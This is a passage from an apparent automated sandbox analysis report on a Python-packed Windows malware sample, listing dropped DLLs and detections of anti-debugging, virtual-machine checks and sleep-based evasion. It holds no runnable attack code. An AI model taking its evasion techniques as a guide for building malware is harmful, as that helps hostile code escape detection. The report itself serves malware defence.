Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography\hazmat\bindings\_openssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_cffi_backend.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-fibers-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_ssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\charset_normalizer\md__mypyc.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-fibers-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\_cffi_backend.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\bcrypt\_bcrypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\python3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\charset_normalizer\md.cp38-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76722\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79002\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe API coverage: 1.4 %
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe API coverage: 1.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1220 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe TID: 7916 Thread sleep count: 847 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe TID: 7916 Thread sleep time: -423500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe TID: 7916 Thread sleep count: 9151 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe TID: 7916 Thread sleep time: -4575500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe TID: 8112 Thread sleep count: 5462 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe TID: 8112 Thread sleep time: -2731000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe TID: 8112 Thread sleep count: 4536 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe TID: 8112 Thread sleep time: -2268000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC26644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 15_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC308E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 15_2_00007FF7ADC308E4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC26644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 15_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC17790 FindFirstFileExW,FindClose, 15_2_00007FF7ADC17790
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC26644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 16_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC308E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 16_2_00007FF7ADC308E4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC26644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 16_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC17790 FindFirstFileExW,FindClose, 16_2_00007FF7ADC17790
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E4471 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte, 16_2_00007FFD839E4471
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643AD08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 23_2_00007FF643AD08E4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643AB7790 FindFirstFileExW,FindClose, 23_2_00007FF643AB7790
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643AC6644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 23_2_00007FF643AC6644
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643AC6644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 23_2_00007FF643AC6644
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643AD08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 24_2_00007FF643AD08E4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643AB7790 FindFirstFileExW,FindClose, 24_2_00007FF643AB7790
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643AC6644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 24_2_00007FF643AC6644
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643AC6644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 24_2_00007FF643AC6644
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144471 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte, 24_2_00007FFD83144471
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8393E7C0 FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, 24_2_00007FFD8393E7C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8393E554 FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, 24_2_00007FFD8393E554
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: bOamY.exe, 0000000F.00000003.2347694673.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2433466511.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp, cacert.pem.23.dr Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: wscript.exe, 00000004.00000003.2284944729.0000025E7AEC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2282766922.0000025E7AEB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2292217896.0000025E7AECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2284628758.0000025E7AEBB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWRootd
Source: wscript.exe, 00000000.00000003.2090533721.000002892CD49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
Source: wscript.exe, 00000004.00000002.2292506633.0000025E7AF56000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2282630738.0000025E7AF56000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B94492000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000004.00000002.2292332642.0000025E7AF1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2282766922.0000025E7AF18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2284944729.0000025E7AF18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2286702444.0000025E7AF1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@k
Source: wscript.exe, 00000000.00000003.2090533721.000002892CD49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: bOamY.exe, 00000010.00000003.2366518146.000001E4F5D0D000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2366243913.000001E4F5CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWr
Source: cacert.pem.23.dr Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd

Anti Debugging
barindex
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E63C0 16_2_00007FFD839E63C0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E6500 16_2_00007FFD839E6500
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD831463C0 24_2_00007FFD831463C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83146500 24_2_00007FFD83146500
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3251 rdtsc 16_2_00007FFD839E3251
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC1B5DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00007FF7ADC1B5DC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC324D0 GetProcessHeap, 15_2_00007FF7ADC324D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC1B5DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00007FF7ADC1B5DC
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC1B7C0 SetUnhandledExceptionFilter, 15_2_00007FF7ADC1B7C0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC1AFC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00007FF7ADC1AFC4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC29A14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00007FF7ADC29A14
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC1B5DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF7ADC1B5DC
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC1B7C0 SetUnhandledExceptionFilter, 16_2_00007FF7ADC1B7C0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC1AFC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF7ADC1AFC4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC29A14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF7ADC29A14
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E4FED __scrt_fastfail,IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FFD839E4FED
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD933633B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FFD933633B4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD9336359C SetUnhandledExceptionFilter, 16_2_00007FFD9336359C
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD93362A38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FFD93362A38
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551D75 __scrt_fastfail,IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FFDA3551D75
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA392C350 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FFDA392C350
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643AC9A14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_00007FF643AC9A14
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643ABB7C0 SetUnhandledExceptionFilter, 23_2_00007FF643ABB7C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643ABAFC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_00007FF643ABAFC4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 23_2_00007FF643ABB5DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_00007FF643ABB5DC
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643AC9A14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00007FF643AC9A14
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643ABB7C0 SetUnhandledExceptionFilter, 24_2_00007FF643ABB7C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643ABAFC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_00007FF643ABAFC4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FF643ABB5DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00007FF643ABB5DC
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD830333B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00007FFD830333B4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83032A38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_00007FFD83032A38
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8303359C SetUnhandledExceptionFilter, 24_2_00007FFD8303359C
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83144FED __scrt_fastfail,IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00007FFD83144FED
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8393C350 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00007FFD8393C350
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD8390F804 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_00007FFD8390F804
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1D75 __scrt_fastfail,IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00007FFD932B1D75

HIPS / PFW / Operating System Protection Evasion
barindex
